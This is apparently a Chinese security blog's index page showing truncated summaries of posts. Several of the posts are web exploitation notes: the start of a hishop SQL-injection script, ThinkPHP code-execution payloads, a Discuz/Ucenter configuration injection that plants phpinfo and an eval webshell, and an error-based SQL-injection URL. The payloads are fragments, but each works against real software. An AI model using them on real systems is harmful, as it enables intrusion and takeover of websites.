射满东城湖

该文被密码保护。 阅读全文

摘要： #coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserRefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import Beauti 阅读全文

摘要： # -*- coding: utf-8 -*- import urllib import urllib2 import re import json import xlwt import time workbook = xlwt.Workbook(encoding='utf-8') #新建一个Exc 阅读全文

摘要： /?s=/abc/abc/abc/{${phpinfo()}}index.php/module/action/param1/${@print(THINK_VERSION)} 执行命令index.php/module/action/param1/$%7B@print(phpinfo())%7D 查看版 阅读全文

摘要： 巴拉巴拉 第一步 域名转ip 第二步 导入到mysql 先建表 然后插入数据 这里有个坑 太大了 插入不了 会卡死 我选择 一次插入5w条 insert into ipss(ip_content) values ('221.204.12'),('121.32.243'); 第三步 写个php连接my 阅读全文

摘要： 第一步:Ucenter api 地址：写入 */phpinfo();// 并提交一次 第二步:F12开干<input type="text" class="input-text" name="data[uc_api','test');'\]" id="uc_api" value=";eval($_P 阅读全文

摘要： http://127.0.0.1/key.php?url=www.xxoo.com&key=我是key&id=userid=1%20and%20%28SELECT%201%20FROM%28SELECT%20count%28*%29,concat%28%28SELECT%28SELECT%20con 阅读全文

摘要： 进入后台站长-Ucenter设置，设置UC_KEY=随意(一定要记住，后面要用),来闭合 http://127.0.0.1/discuz34/uc_server');phpinfo();// 成功写进配置文件，这里单引号被转移了，我们接下来使用UC_KEY(dz)去调用api/uc.php中的upd 阅读全文

摘要： 搭建环境，我在本地搭建域名为www.xxoo.com的测试环境。 打开burpsuite，进行拦截 打开火狐浏览器，访问有漏洞的网站。 http://www.xxoo.com/index.php 在burpsuite下可以看到拦截到的数据包，然后选择repeater进行重放。 修改数据包访问,以GE 阅读全文